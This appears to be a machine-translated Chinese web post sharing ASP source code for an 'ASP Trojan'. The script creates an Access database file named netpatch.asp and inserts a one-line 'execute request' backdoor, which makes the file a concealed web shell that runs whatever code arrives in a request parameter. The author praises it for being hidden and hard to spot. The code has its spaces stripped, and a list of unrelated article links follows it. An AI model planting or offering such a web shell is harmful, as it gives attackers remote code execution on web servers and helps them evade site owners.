I was originally looking for the ASP Trojan program by Brother LAKER2.
Now the challenge has been successfully completed and has been added as the inspection object. I will publish the code to send a message to friends at Freezing Point, I hope everyone likes it!
It uses the ADOX.Catalog component
The code copy is as follows:
<% 'codebynetpatch
dimdbfile,sql
db="netpatch.asp"
dbfile=server.MapPath(db)
setydb=server.CreateObject("ADOX.Catalog")
ydb.Create"Provider=Microsoft.Jet.OLEDB.4.0;DataSource="&dbfile
setydb=nothing
iferr.number=0then
Response.Writedbfile&"Create successfully<br>"
else
Response.Write"Creation failed, reason: "&err.description
Response.End
endif
SetConn=Server.CreateObject("ADODB.Connection")
Conn.Open"Provider=Microsoft.Jet.OLEDB.4.0;DataSource="&dbfile
sql="CREATETABLEfdata([data]Memo)"
conn.execute(sql)
Setrs=CreateObject("ADODB.RecordSet")
rs.Open"FData",conn,1,3
rs.addnew
rs("data")="<%executerequest("n"))%>"'(Remember to remove the comments! One sentence backdoor executionerquest("n"))
rs.update
%>
This script mainly utilizes the ADOX.Catalog component
Create a new empty database file with the name netpatch.asp
Then insert a sentence Trojan into the newly created table as a C/S version of ASP horse!
Advantages are relatively hidden, and it is not easy for people to see what this is for!
Articles that may be of interest to you:
FreeTextBox Chinese version download [including source code] of asp.net decrypts ASP source code Ajax+Asp source code] Read the table of database content (no framework) ASP generates column-shaped bodies, line charts, pie chart source code asp implemented by 7xi Music Network collection source code asp.net Chinese verification code, free open source code AspNetPager paging control source code (Version 4.2) The first domestic asp server (netbox production, open source code) that also supports custom 404/505/rewrite to generate column-shaped bodies, line charts, pie chart source code provides a summary of the commonly used ASP source code for asp.net downloads web page source code and files on websites that need to be logged in (Part 1)